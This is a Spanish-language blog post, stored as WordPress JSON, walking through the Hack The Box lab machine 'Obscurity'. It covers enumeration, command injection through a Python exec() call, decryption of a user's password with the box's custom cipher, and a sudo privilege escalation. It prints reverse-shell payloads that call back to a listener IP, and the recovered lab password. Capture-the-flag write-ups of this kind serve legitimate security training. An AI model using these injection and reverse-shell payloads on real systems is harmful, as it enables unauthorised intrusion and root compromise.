{"id":438,"date":"2020-05-17T18:10:29","date_gmt":"2020-05-17T18:10:29","guid":{"rendered":"http:\/\/infayer.com\/?p=438"},"modified":"2023-10-12T13:04:09","modified_gmt":"2023-10-12T12:04:09","slug":"maquina-obscurity-de-hack-the-box","status":"publish","type":"post","link":"https:\/\/infayer.com\/archivos\/438","title":{"rendered":"M\u00e1quina Obscurity de Hack The Box"},"content":{"rendered":"\n
\n\n\n\n

Esta fue una m\u00e1quina\nampliamente interesante, en ella se debe aplicar desde el primer\nmomento bastante lectura de c\u00f3digo fuente en Python, para aprovechar\nciertas caracter\u00edsticas en los mismos y conseguir el prop\u00f3sito.<\/p>\n\n\n

\n
\"\"<\/figure><\/div>\n\n\n

<\/p>\n\n\n\n

Resumen:<\/h2>\n\n\n\n
    \n
  • Enumeraci\u00f3n de puertos y servicios v\u00eda Nmap<\/li>\n\n\n\n
  • Reconocimiento de plataforma web y descubrimiento de recursos internos<\/li>\n\n\n\n
  • Aprovechamiento de funci\u00f3n exec()<\/em><\/li>\n\n\n\n
  • Obtenci\u00f3n de usuario \/ Captura del fichero user.txt<\/li>\n\n\n\n
  • Escalada de privilegios \/ Captura de fichero root.txt<\/li>\n<\/ul>\n\n\n\n

    Enumeraci\u00f3n:<\/h2>\n\n\n\n

    Tras una identificaci\u00f3n r\u00e1pida de puertos y servicios con Nmap<\/em> obtenemos el siguiente resultado:<\/p>\n\n\n\n

    nmap -sS -sV --open 10.10.10.168<\/pre>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    El puerto 8080 arroja una plataforma web, si se visita v\u00eda navegador se obtiene el siguiente resultado:<\/p>\n\n\n\n
    http:\/\/10.10.10.168:8080\/<\/pre>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    Revisando detenidamente la plataforma web se observa la siguiente secci\u00f3n descrita como Development<\/em>.<\/p>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    Esta ser\u00e1 la pista suficiente para entender que debemos buscar el directorio concreto donde se aloja el fichero SuperSecureServer.py<\/em>. Realizamos un barrido a trav\u00e9s de Wfuzz<\/em>.<\/p>\n\n\n\n
    wfuzz --sc=200 -w \/usr\/share\/dirb\/wordlists\/common.txt -u http:\/\/10.10.10.168:8080\/FUZZ\/SuperSecureServer.py<\/pre>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    Evidenciando el directorio develop<\/em> que aloja este primer recurso en Python, procedemos a la descarga del mismo y al an\u00e1lisis de c\u00f3digo, identificando la funci\u00f3n exec()<\/em> que emplearemos para conseguir el acceso a la m\u00e1quina.<\/p>\n\n\n\n
    curl -s http:\/\/10.10.10.168:8080\/develop\/SuperSecureServer.py -o SuperSecureServer.py\ncat SuperSecureServer.py | grep exec<\/pre>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    Despu\u00e9s de varias pruebas con el c\u00f3digo fuente ejecutado de forma interna, se identifica el payload<\/em> necesario para conseguir ejecutar comandos en la m\u00e1quina objetivo: ‘;os.system(\u00abcomando\u00bb);’<\/em>.<\/p>\n\n\n\n
    Se emplea lo siguiente para conseguir una reverse shell<\/em> y ganar acceso a la m\u00e1quina:<\/p>\n\n\n\n
    ';os.system(\"bash -c 'bash -i >& \/dev\/tcp\/10.10.15.132\/5544 0>&1'\");'<\/pre>\n\n\n\n
    Tomando en cuenta la codificaci\u00f3n en formato URL<\/em> para los caracteres espacio (%20<\/em>), comillas dobles (%22<\/em>) y signo de mayor que (%3E<\/em>).<\/p>\n\n\n\n
    ';os.system(%22bash%20-c%20'bash%20-i%20%3E&amp;%20\/dev\/tcp\/10.10.15.132\/5544%200%3E&amp;1'%22);'<\/pre>\n\n\n\n
    Con esto ya asumido\npodemos conseguir el prop\u00f3sito.<\/p>\n\n\n\n
    nc -lvnp 5544\ncurl \"http:\/\/10.10.10.168:8080\/';os.system(%22bash%20-c%20'bash%20-i%20%3E&%20\/dev\/tcp\/10.10.15.132\/5544%200%3E&1'%22);'\"\nid; hostname; hostname -I<\/pre>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    Obtenci\u00f3n de\nusuario:<\/h2>\n\n\n\n
    Identificamos como usuario del sistema a robert<\/em> y dentro de su directorio principal se ubican los siguiente recursos:<\/p>\n\n\n
    \n
    \"\"<\/figure><\/div>\n\n\n
    <\/p>\n\n\n\n
    En donde b\u00e1sicamente\ncada uno de estos ficheros son:<\/p>\n\n\n\n
      \n
    • check.txt.-<\/em><\/strong> Cuenta con el mensaje que se emplear\u00e1 para el descifrado de out.txt.<\/li>\n\n\n\n
    • out.txt.-<\/em><\/strong> Primer fichero cifrado que cuenta con clave para descifrar el siguiente recurso.<\/li>\n\n\n\n
    • passwordreminder.txt.-<\/em><\/strong> Fichero cifrado que cuenta con la password del usuario robert.<\/li>\n\n\n\n
    • SuperSecureCrypt.py.-<\/em><\/strong> Script para el cifrado\/descifrado a partir de una clave.<\/li>\n<\/ul>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Por lo tanto emplearemos SuperSecureCrypt.py<\/em> para conseguir llegar a la contrase\u00f1a del usuario robert<\/em>. Si vemos la ayuda de este script<\/em> obtenemos lo siguiente:<\/p>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Lo primero ser\u00e1 conseguir descifrar el fichero out.txt<\/em> a partir del string<\/em> (clave) del fichero check.txt<\/em>, todo esto depositado en la siguiente ruta: \/tmp\/first_password.txt<\/em>.<\/p>\n\n\n\n
      python3 SuperSecureCrypt.py -i out.txt -o \/tmp\/first_password.txt -k 'Encrypting this file with your key should result in out.txt, make sure your key is correct!' -d<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      cat \/tmp\/first_password.txt<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Luego vamos con el siguiente fichero: passwordreminder.txt<\/em> que ser\u00e1 descifrado con la clave alexandrovich<\/em> y nuevamente depositado en un tercer fichero (con el nombre que deseemos): \/tmp\/password_robert.txt<\/em>.<\/p>\n\n\n\n
      python3 SuperSecureCrypt.py -i passwordreminder.txt -o \/tmp\/password_robert.txt -k 'alexandrovich' -d<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      cat \/tmp\/password_robert.txt<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Ya con esto conseguido, nos toca conectarnos a trav\u00e9s de SSH<\/em> con las credenciales del usuario robert<\/em> y hacernos con la flag<\/em> de user<\/em>.<\/p>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Escalada de\nprivilegios:<\/h2>\n\n\n\n
      Para la escalada de privilegios y observando el resultado de sudo -l<\/em>, comprendemos que todo pasa por emplear el recurso existente en el directorio BetterSSH<\/em>.<\/p>\n\n\n\n
      sudo -l<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      ls -la<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Despu\u00e9s de algunas pruebas, se identific\u00f3 que el script<\/em> cuenta con una inconsistencia en su flujo, por tanto es posible ejecutar comandos con m\u00e1ximos privilegios mientras pongamos por delante lo siguiente: \u201c-u root<\/em>\u201d<\/p>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      De esta manera podemos hacernos con la flag<\/em> del root<\/em>.<\/p>\n\n\n\n
      sudo python3 \/home\/robert\/BetterSSH\/BetterSSH.py\nEnter username: robert\nEnter password: SecThruObsFTW\nrobert@Obscure$ -u root cat \/root\/root.txt<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Si adicionalmente buscamos hacernos con una sesi\u00f3n de root<\/em>, podr\u00edamos hacernos una reverse shell<\/em> de la siguiente manera:<\/p>\n\n\n\n
      echo \"bash -i >& \/dev\/tcp\/10.10.15.123\/2233 0>&1\" > .hell.sh\nsudo python3 \/home\/robert\/BetterSSH\/BetterSSH.py\nEnter username: robert\nEnter password: SecThruObsFTW\n-u root bash \/tmp\/.hell.sh\nid; hostname; hostname -I<\/pre>\n\n\n
      \n
      \"\"<\/figure><\/div>\n\n\n
      <\/p>\n\n\n\n
      Como he dicho en\notras ocasiones, eso ya depende de la necesidad que tengamos. Conmigo\nser\u00e1 hasta la pr\u00f3xima entrada.<\/p>\n","protected":false},"excerpt":{"rendered":"
      Esta fue una m\u00e1quina ampliamente interesante, en ella se debe aplicar desde el primer momento bastante lectura de c\u00f3digo fuente en Python, para aprovechar ciertas caracter\u00edsticas en los mismos y conseguir el prop\u00f3sito.<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[10,9],"tags":[],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts\/438"}],"collection":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/comments?post=438"}],"version-history":[{"count":8,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts\/438\/revisions"}],"predecessor-version":[{"id":2550,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts\/438\/revisions\/2550"}],"wp:attachment":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/media?parent=438"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/categories?post=438"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/tags?post=438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}